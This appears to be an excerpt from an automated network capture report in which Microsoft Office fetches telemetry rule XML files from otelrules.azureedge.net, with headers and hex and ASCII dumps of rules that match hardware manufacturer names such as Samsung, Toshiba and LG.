                                                                        2024-12-03 16:50:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        49192.168.2.44980713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:37 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:38 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:37 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 494
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                        ETag: "0x8DC582BB8972972"
                                                                        x-ms-request-id: 1e31e9ea-701e-0098-028a-43395f000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165037Z-174f7845968cdxdrhC1EWRg0en000000164000000000kfug
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:38 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        50192.168.2.44980913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:39 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:39 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:39 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 472
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                        ETag: "0x8DC582B9D43097E"
                                                                        x-ms-request-id: c0407c6d-d01e-0082-369d-43e489000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165039Z-174f7845968kvnqxhC1EWRmf3g0000000sxg00000000r6nh
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:39 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        51192.168.2.44980813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:39 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:39 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:39 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 420
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                        x-ms-request-id: 06c834e2-b01e-0001-1c8a-4346e2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165039Z-174f7845968xr5c2hC1EWRd0hn0000000qz000000000r26w
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:39 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        52192.168.2.44981113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:39 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:39 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:39 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 486
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                        ETag: "0x8DC582B92FCB436"
                                                                        x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165039Z-174f7845968kvnqxhC1EWRmf3g0000000t2g000000005ga8
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:39 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        53192.168.2.44981013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:39 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:40 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:39 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 427
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                        ETag: "0x8DC582BA909FA21"
                                                                        x-ms-request-id: b5d3fb3c-c01e-000b-6fb4-42e255000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165039Z-174f7845968kdththC1EWRzvxn0000000kh000000000h51t
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:40 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        54192.168.2.44981213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:39 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:40 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:40 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 423
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                        ETag: "0x8DC582BB7564CE8"
                                                                        x-ms-request-id: 3b8b6251-d01e-0049-3c33-44e7dc000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165040Z-174f7845968swgbqhC1EWRmnb4000000169g00000000p92k
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:40 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        55192.168.2.44981413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:41 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:41 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:41 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 404
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                        ETag: "0x8DC582B95C61A3C"
                                                                        x-ms-request-id: fef7e303-301e-0096-4af2-44e71d000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165041Z-174f7845968cs2nkhC1EWR2tq000000001xg00000000934z
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:41 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        56192.168.2.44981313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:41 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:42 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:41 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 478
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                        ETag: "0x8DC582B9B233827"
                                                                        x-ms-request-id: ef6d0e99-401e-0067-3dc7-4309c2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165041Z-174f7845968zgtf6hC1EWRqd8s0000000z3g00000000na9p
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:42 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        57192.168.2.44981613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:41 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:42 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:42 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 400
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                        ETag: "0x8DC582BB2D62837"
                                                                        x-ms-request-id: 241a7da4-a01e-00ab-50cc-439106000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165042Z-174f784596886s2bhC1EWR743w00000016b0000000001qd4
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:42 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        58192.168.2.44981513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:41 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:42 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:42 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 468
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                        ETag: "0x8DC582BB046B576"
                                                                        x-ms-request-id: bff90166-801e-0083-05f9-44f0ae000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165042Z-174f784596886s2bhC1EWR743w000000165000000000rb68
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:42 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        59192.168.2.44981713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:42 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:42 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:42 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 479
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                        ETag: "0x8DC582BB7D702D0"
                                                                        x-ms-request-id: 6644a72f-f01e-001f-6d66-435dc8000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165042Z-174f784596886s2bhC1EWR743w000000169000000000a17u
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
